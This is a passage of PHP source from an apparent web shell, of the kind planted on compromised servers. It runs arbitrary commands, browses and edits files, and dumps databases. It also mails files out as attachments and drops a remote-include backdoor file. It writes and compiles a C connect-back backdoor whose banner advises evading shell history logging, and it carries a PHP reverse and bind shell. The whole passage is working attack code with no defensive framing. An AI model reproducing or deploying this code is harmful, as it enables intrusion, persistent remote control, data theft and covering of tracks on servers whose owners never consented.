' } else echo "<b>$key</b>=>$val<br/>";'.
|
|
'};';
|
|
eval($q);
|
|
echo "</blockquote>\n";
|
|
}
|
|
|
|
function ddb($v) {
|
|
echo "<blockquote>\n";
|
|
$q="while(list(\$key,\$val) = each(\$$v)) {".
|
|
' if((is_array($val)) && ($key!="GLOBALS")) {'.
|
|
' echo "<b>$key</b>>><br/>";'.
|
|
' @dd($v."[".$key."]");'.
|
|
' } else if($key=="GLOBALS") {'.
|
|
' } else echo "<b>$key</b>=>$val<br/>";'.
|
|
'};';
|
|
eval($q);
|
|
echo "</blockquote>\n";
|
|
}
|
|
|
|
######################################################################
|
|
# cmd shell functions
|
|
######################################################################
|
|
# test what cmd is working
|
|
function test_cmd_shell(){
|
|
if(strlen(Mexec("pwd", 5))>11) $var = 5;
|
|
elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
|
|
elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
|
|
elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
|
|
elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
|
|
else $var = 0;
|
|
return $var;
|
|
}
|
|
# function for executing cmds
|
|
function Mexec($Mcmd, $type) {
|
|
if($Mcmd != ""){
|
|
$dspec = array(
|
|
0 => array("pipe", "r"),
|
|
1 => array("pipe", "w"),
|
|
2 => array("pipe", "r")
|
|
);
|
|
$output = "";
|
|
switch($type) {
|
|
case 5:
|
|
$output .= "<pre>";
|
|
$lastline = exec($Mcmd, $arrOutput);
|
|
foreach($arrOutput as $val) {
|
|
$output .= $val . "\n";
|
|
}
|
|
$output .= "</pre>";
|
|
break;
|
|
case 4:
|
|
$proc = proc_open($Mcmd, $dspec, $pipes);
|
|
if (is_resource($proc)) {
|
|
$output .= "<pre>";
|
|
fclose($pipes[0]);
|
|
while(!feof($pipes[1])) {
|
|
$tmp = fgets($pipes[1], 1024);
|
|
$output .= $tmp;
|
|
}
|
|
$output .= "</pre>";
|
|
}
|
|
break;
|
|
case 3;
|
|
$output .= "<pre>";
|
|
$output .= `$Mcmd`;
|
|
$output .= "</pre>";
|
|
break;
|
|
case 2;
|
|
print "<pre>\n";
|
|
$output = system($Mcmd);
|
|
print "</pre>\n";
|
|
break;
|
|
case 1;
|
|
print "<pre>\n";
|
|
$output = passthru($Mcmd);
|
|
print "</pre>\n";
|
|
break;
|
|
case 0;
|
|
default;
|
|
$output = "There are no execute functions available!";
|
|
break;
|
|
}
|
|
return $output;
|
|
}
|
|
}
|
|
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
|
|
$msgerror = "";
|
|
if($msg == "") $msgerror = "please enter a message";
|
|
elseif($subject == "") $msgerror = "please enter a subject";
|
|
else {
|
|
$stlf = md5(uniqid(time()));
|
|
$attach = "";
|
|
$fp = fopen($attach_source, "rb");
|
|
if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); }
|
|
$header = "From: $from\n";
|
|
$header .= "MIME-Version: 1.0\n";
|
|
$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n";
|
|
$header .= "This is a multi-part message in MIME format\n";
|
|
$header .= "--$stlf\n";
|
|
$header .= "Content-Type: text/plain\n";
|
|
$header .= "Content-Transfer-Encoding: 8bit\n\n";
|
|
$header .= "$msg\n";
|
|
$header .= "--$stlf\n";
|
|
$header .= "Content-Type: $content_type; name=$attach_appear\n";
|
|
$header .= "Content-Transfer-Encoding: base64\n";
|
|
$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n";
|
|
$header .= chunk_split(base64_encode($attach));
|
|
$header .= "\n";
|
|
$header .= "--$stlf--";
|
|
mail($to,$subject,"",$header);
|
|
$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
|
|
}
|
|
return $msgerror;
|
|
}
|
|
|
|
######################################################################
|
|
# system browsing
|
|
######################################################################
|
|
|
|
function make_switch($val){
|
|
global $txt;
|
|
global $lang;
|
|
global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
|
|
if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
|
|
else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
|
|
return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
|
|
}
|
|
function drop_syslog_warning($msg) {
|
|
global $syslog;
|
|
# if($syslog == 1) syslog(LOG_WARNING,$msg);
|
|
}
|
|
|
|
######################################################################
|
|
# file functions
|
|
######################################################################
|
|
function copy_file($source,$dest) {
|
|
$dataout = "";
|
|
if($source == "") $dataout .= "enter source<br>\n";
|
|
if($dest != "") {
|
|
ini_set("user_agent","m0ins downloader");
|
|
if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
|
|
if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
|
|
} else {
|
|
$dataout .= "enter destination";
|
|
}
|
|
}
|
|
function edit_file($cont,$dest,$do) {
|
|
$dataout = "";
|
|
global $magic_quotes_gpc;
|
|
if(file_exists($dest)) {
|
|
if($do == 1){
|
|
$fh = fopen($dest, "w");
|
|
if(!$fh) {
|
|
$dataout .= "unable to open <b>$dest</b>.\n";
|
|
} else {
|
|
# $cont = str_replace(">", ">", str_replace("<", "<", $cont));
|
|
if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
|
|
$write = fwrite($fh, $cont);
|
|
fclose($fh);
|
|
}
|
|
}
|
|
$dataout .= highlight_file($dest, 1);
|
|
} else {
|
|
$dataout .= "unable to open <b>$dest</b>.\n";
|
|
}
|
|
return $dataout;
|
|
}
|
|
function show_file($source) {
|
|
$dataout = "";
|
|
if(file_exists($source)) {
|
|
$fh = fopen($source, "r");
|
|
if(!$fh) {
|
|
$dataout .= "unable to open <b>$source</b>.\n";
|
|
} else {
|
|
$read = fread($fh, filesize($source));
|
|
fclose($fh);
|
|
if(!empty($read)) $read = str_replace(">", ">", str_replace("<", "<", $read));
|
|
$dataout .= $read;
|
|
}
|
|
} else {
|
|
$dataout .= "unable to open <b>$source</b>.\n";
|
|
}
|
|
return $dataout;
|
|
}
|
|
function snoopy($chdir){
|
|
$tmpOut = "";
|
|
global $is_file,$is_dir,$is_w_dir,$is_w_file;
|
|
$fh = opendir("$chdir");
|
|
if($fh!="") {
|
|
while (false !== ($filename = readdir($fh)) ) {
|
|
$FN = $chdir."/".$filename;
|
|
if(@is_file($FN)) $is_file[] = $filename;
|
|
if(@is_dir($FN)) $is_dir[] = $filename;
|
|
if(@is_writable($FN) && @is_dir($filename)) $is_w_dir[] = $filename;
|
|
if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
|
|
}
|
|
$tmpOut .= "<table border=1 cellspacing=1 cellpadding=0><tr>";
|
|
$tmpOut .= echo_files($is_file, "all files");
|
|
$tmpOut .= echo_files($is_dir, "only dirs");
|
|
$tmpOut .= echo_files($is_w_dir, "writable dirs");
|
|
$tmpOut .= echo_files($is_w_file,"writable files");
|
|
$tmpOut .= "</tr></table>";
|
|
} else {
|
|
$tmpOut .= "Permission denied.";
|
|
}
|
|
closedir($fh);
|
|
return $tmpOut;
|
|
}
|
|
|
|
function echo_files($arr,$txt){
|
|
$tmpOutMF = "";
|
|
global $chdir,$MyLoc,$SREQ;
|
|
$tmpOutMF .= "<td valign=top>";
|
|
$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
|
|
if(count($arr) > 0) {
|
|
foreach($arr as $key => $file) {
|
|
$FN = $chdir."/".$file;
|
|
$owner = fileowner($FN);
|
|
$perms = substr(sprintf("%o",fileperms($FN)),-3);
|
|
if(@is_writable($FN) && @is_dir($FN)) $tmpOutMF .= "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
|
|
elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .= "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
|
|
elseif(@is_file($FN)) $tmpOutMF .= "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>";
|
|
elseif(@is_dir($FN)) $tmpOutMF .= "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
|
|
}
|
|
}
|
|
$tmpOutMF .= "</td>";
|
|
return $tmpOutMF;
|
|
}
|
|
function print_globals($v) {
|
|
global $a;
|
|
echo "<blockquote>\n";
|
|
$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
|
|
" echo \"<b>\$key</b>=>\$val.<br>\"; ".
|
|
" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
|
|
" @print_globals( \$v.\"[\".\$key.\"]\" );".
|
|
"}}";
|
|
eval($q);
|
|
echo "</blockquote>\n";
|
|
}
|
|
######################################################################
|
|
# connect back shell function
|
|
######################################################################
|
|
|
|
function connect_back($tmp_dir, $compiler, $host, $port) {
|
|
$shell = "#include <stdio.h>\n" .
|
|
"#include <sys/socket.h>\n" .
|
|
"#include <netinet/in.h>\n" .
|
|
"#include <arpa/inet.h>\n" .
|
|
"#include <netdb.h>\n" .
|
|
"int main(int argc, char **argv) {\n" .
|
|
" char *host;\n" .
|
|
" int port = 80;\n" .
|
|
" int f;\n" .
|
|
" int l;\n" .
|
|
" int sock;\n" .
|
|
" struct in_addr ia;\n" .
|
|
" struct sockaddr_in sin, from;\n" .
|
|
" struct hostent *he;\n" .
|
|
" char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
|
|
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
|
|
" \"For More Reliable Shell.\\n\"\n" .
|
|
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
|
|
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
|
|
" printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
|
|
" if (argc < 2 || argc > 3) {\n" .
|
|
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Dumping Arguments\\n\");\n" .
|
|
" l = strlen(argv[1]);\n" .
|
|
" if (l <= 0) {\n" .
|
|
" printf(\"[-] Invalid Host Name\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" if (!(host = (char *) malloc(l))) {\n" .
|
|
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" strncpy(host, argv[1], l);\n" .
|
|
" if (argc == 3) {\n" .
|
|
" port = atoi(argv[2]);\n" .
|
|
" if (port <= 0 || port > 65535) {\n" .
|
|
" printf(\"[-] Invalid Port Number\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Resolving Host Name\\n\");\n" .
|
|
" he = gethostbyname(host);\n" .
|
|
" if (he) {\n" .
|
|
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
|
|
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
|
|
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" sin.sin_family = PF_INET;\n" .
|
|
" sin.sin_addr.s_addr = ia.s_addr;\n" .
|
|
" sin.sin_port = htons(port);\n" .
|
|
" printf(\"[*] Connecting...\\n\");\n" .
|
|
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
|
|
" printf(\"[-] Socket Error\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
|
|
" printf(\"[-] Unable to Connect\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Spawning Shell\\n\");\n" .
|
|
" f = fork( );\n" .
|
|
" if (f < 0) {\n" .
|
|
" printf(\"[-] Unable to Fork\\n\");\n" .
|
|
" return 1;\n" .
|
|
" } else if (!f) {\n" .
|
|
" write(sock, msg, sizeof(msg));\n" .
|
|
" dup2(sock, 0);\n" .
|
|
" dup2(sock, 1);\n" .
|
|
" dup2(sock, 2);\n" .
|
|
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
|
|
" close(sock);\n" .
|
|
" return 0;\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Detached\\n\\n\");\n" .
|
|
" return 0;\n" .
|
|
"}\n";
|
|
$fbname = $tmp_dir . "/cbs";
|
|
$fp = fopen($fbname . ".c", "w");
|
|
$write = fwrite($fp, $shell);
|
|
fclose($fp);
|
|
if(!empty($write)) {
|
|
$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
|
|
$execM = test_cmd_shell();
|
|
if($execM > 0) {
|
|
$rtval = Mexec($command, $execM);
|
|
$command = $fbname . " " . $host . " " . $port;
|
|
$rtval .= Mexec($command, $execM);
|
|
return "<pre>" . $rtval . "</pre>";
|
|
} else {
|
|
return "<b>ERROR! No EXEC Avilable!</b>";
|
|
}
|
|
|
|
} else {
|
|
return "<b>ERROR! Writing data!</b>";
|
|
}
|
|
}
|
|
|
|
######################################################################
|
|
# drop mini inc hole
|
|
######################################################################
|
|
function dropminiinc($location) {
|
|
$Scode = "<?php\n".
|
|
"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
|
|
"else \$vars = \$_REQUEST;\n".
|
|
"include(\$vars[inc]);\n".
|
|
"?>\n";
|
|
$fp = fopen($location, "w");
|
|
$write = fwrite($fp, $Scode);
|
|
if(!empty($write)) return "<b>$location</b> copied\n";
|
|
else return "<b>ERROR! Not copied!</b>";
|
|
}
|
|
|
|
######################################################################
|
|
# db functions
|
|
# unchanged from dans code
|
|
######################################################################
|
|
function prep_rows($myresult) {
|
|
$dataout = "<table>\n";
|
|
$num_fields = mysql_num_fields($myresult);
|
|
$dataout .= "<tr border=1>\n";
|
|
for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
|
|
$dataout .= "</tr>\n";
|
|
while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
|
|
$dataout .= "<tr>\n";
|
|
foreach($line as $colvalue) {
|
|
$dataout .= "<td>$colvalue</td>\n";
|
|
}
|
|
$dataout .= "</tr>\n";
|
|
}
|
|
$dataout .= "</table>\n";
|
|
return $dataout;
|
|
}
|
|
|
|
function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
|
|
$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
mysql_select_db($mydb); // or return "Could not select database";
|
|
$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
|
|
$result = mysql_query($query); // or return "Query failed: ".mysql_error();
|
|
mysql_free_result($result);
|
|
mysql_close($link);
|
|
return "Hopefully dumped!";
|
|
}
|
|
|
|
function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
|
|
$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
mysql_select_db($mydb); // or return "Could not select database";
|
|
$query = $mysql." INTO OUTFILE \"".$mydump."\";";
|
|
$result = mysql_query($query); // or return "Query failed: ".mysql_error();
|
|
mysql_free_result($result);
|
|
mysql_close($link);
|
|
return "Hopefully dumped!";
|
|
}
|
|
|
|
function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
|
|
$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
mysql_select_db($mydb); // or return "Could not select database";
|
|
$query = $mysql;
|
|
$result = mysql_query($query); // or return "Query failed: ".mysql_error();
|
|
$dataouted = prep_rows($result);
|
|
mysql_free_result($result);
|
|
mysql_close($link);
|
|
return($dataouted);
|
|
}
|
|
|
|
function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
|
|
$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
mysql_select_db($mydb); // or return "Could not select database";
|
|
$query = "SELECT * FROM ".$mytable;
|
|
$result = mysql_query($query); // or return "Query failed: ".mysql_error();
|
|
$dataouted = prep_rows($result);
|
|
mysql_free_result($result);
|
|
mysql_close($link);
|
|
return($dataouted);
|
|
}
|
|
|
|
function display_tables($myhost, $myuser, $mypass, $mydb) {
|
|
global $MyLoc,$SREQ;
|
|
$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
$result = mysql_list_tables($mydb);
|
|
if (!$result) {
|
|
return "DB Error, could not list tables";
|
|
}
|
|
$dataout = "<table>\n";
|
|
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
|
|
$dataout .= "<tr>\n";
|
|
foreach ($line as $col_value) {
|
|
$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
|
|
}
|
|
$dataout .= "</tr>\n";
|
|
}
|
|
$dataout .= "</table>\n";
|
|
mysql_free_result($result);
|
|
mysql_close($link);
|
|
return($dataout);
|
|
}
|
|
|
|
function display_dbs($myhost, $myuser, $mypass) {
|
|
global $MyLoc,$SREQ;
|
|
$link = mysql_connect($myhost, $myuser, $mypass);
|
|
$result = mysql_list_dbs($link);
|
|
if (!$result) {
|
|
return "DB Error, could not list databases";
|
|
}
|
|
$dataout = "<table>\n";
|
|
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
|
|
$dataout .= "<tr>\n";
|
|
foreach ($line as $col_value) {
|
|
$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
|
|
}
|
|
$dataout .= "</tr>\n";
|
|
}
|
|
$dataout .= "</table>\n";
|
|
mysql_free_result($result);
|
|
mysql_close($link);
|
|
return($dataout);
|
|
}
|
|
|
|
function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
|
|
$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
$query = "SELECT * FROM ".$mytable;
|
|
$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
|
|
$dataout = "<table>\n";
|
|
while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
|
|
$dataout = $dataout . "<tr>\n";
|
|
foreach($line as $colvalue) {
|
|
$dataout = $dataout . "<td>$colvalue</td>\n";
|
|
}
|
|
$dataout = $dataout . "</tr>\n";
|
|
}
|
|
$dataout = $dataout . "</table>\n";
|
|
return($dataout);
|
|
}
|
|
|
|
function Odisplay_tables($myhost, $myuser, $mypass) {
|
|
$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
|
|
$result = odbc_tables($link);
|
|
if (!$result) {
|
|
return "DB Error, could not list tables";
|
|
}
|
|
$dataout = "<table>\n";
|
|
while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
|
|
if(odbc_result($line, 4) == "TABLE") {
|
|
$dataout = $dataout . "<tr>\n";
|
|
$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n";
|
|
}
|
|
$dataout = $dataout . "</tr>\n";
|
|
}
|
|
$dataout = $dataout . "</table>\n";
|
|
return($dataout);
|
|
}
|
|
|
|
######################################################################
|
|
# Dan's Network function Wrappers
|
|
# Initial use inside this script, need to handle the error data
|
|
# differently to get it included in the base 64 output!
|
|
######################################################################
|
|
|
|
function DB_NET_GET_SOCKET_PROTOCOL($prot) {
|
|
switch($prot) {
|
|
case "udp":
|
|
$protocol = SOL_UDP;
|
|
$socktype = SOCK_DGRAM;
|
|
break;
|
|
case "tcp":
|
|
default:
|
|
$protocol = SOL_TCP;
|
|
$socktype = SOCK_STREAM;
|
|
break;
|
|
}
|
|
return(array($protocol, $socktype));
|
|
}
|
|
|
|
function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
|
|
$address = gethostbyname($hostname);
|
|
list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
|
|
switch($prot) {
|
|
case "udp":
|
|
$protocol = SOL_UDP;
|
|
$socktype = SOCK_DGRAM;
|
|
break;
|
|
case "tcp":
|
|
default:
|
|
$protocol = SOL_TCP;
|
|
$socktype = SOCK_STREAM;
|
|
break;
|
|
}
|
|
$socket = socket_create(AF_INET, $socktype, $protocol);
|
|
if ($socket < 0) {
|
|
echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
|
|
}
|
|
|
|
$result = socket_connect($socket, $address, $port);
|
|
if ($result < 0) {
|
|
echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
|
|
}
|
|
return $socket;
|
|
}
|
|
|
|
function DB_NET_LISTEN($address, $port) {
|
|
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
|
|
echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
|
|
return(-1);
|
|
}
|
|
|
|
if (($ret = socket_bind($sock, $address, $port)) < 0) {
|
|
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
|
|
return(-2);
|
|
}
|
|
|
|
if (($ret = socket_listen($sock, 5)) < 0) {
|
|
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
|
|
return(-3);
|
|
}
|
|
|
|
return($sock);
|
|
}
|
|
|
|
######################################################################
|
|
# Dan's PHP Connect Back / Port Binding Shell!
|
|
# Yes that right a REAL shell!
|
|
# Now I had this idea for ages, finally coded it 6 months ago, and
|
|
# it's never really been used.
|
|
# Not really brain science but when there are many examples of PHP
|
|
# sockets + proc_open it's a little harder.
|
|
######################################################################
|
|
|
|
function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
|
|
if($type == "cb" && $host != "0.0.0.0") {
|
|
$procsock = DB_NET_CONNECT($host, $port, "tcp");
|
|
} elseif ($type == "pb") {
|
|
$lsock = DB_NET_LISTEN($host, $port);
|
|
if (($procsock = socket_accept($lsock)) < 0) {
|
|
return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
|
|
}
|
|
} else {
|
|
return "Error no connection details specified!";
|
|
}
|
|
|
|
set_time_limit(9000);
|
|
$descriptorspec = array(
|
|
0 => array("pipe", "r"),
|
|
1 => array("pipe", "w"),
|
|
2 => array("pipe", "w")
|
|
);
|
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
|
if (is_resource($process)) {
|
|
$tmp_loop = 1;
|
|
do {
|
|
$tmp_array = array($procsock);
|
|
$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
|
|
if ($num_changed_sockets === false) {
|
|
$tmp_loop = 0;
|
|
} else if ($num_changed_sockets > 0) {
|
|
foreach($tmp_array as $k => $v) {
|
|
if($v == $procsock) {
|
|
if(socket_last_error($procsock) > 0) $tmp_loop = 0;
|
|
if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
|
|
fwrite($pipes[0], $buf);
|
|
}
|
|
}
|
|
}
|
|
$tmp_arrayS = array($pipes[1], $pipes[2]);
|
|
$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
|
|
if ($num_changed_streams === FALSE) {
|
|
$tmp_loop = 0;
|
|
} else if ($num_changed_streams > 0) {
|
|
foreach($tmp_arrayS as $k => $v) {
|
|
if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
|
|
socket_write($procsock, $buf, strlen($buf));
|
|
}
|
|
}
|
|
} while($tmp_loop == 1);
|
|
} else {
|
|
return "Error executing shell " . $shell;
|
|
}
|
|
}
|
|
|
|
?>
|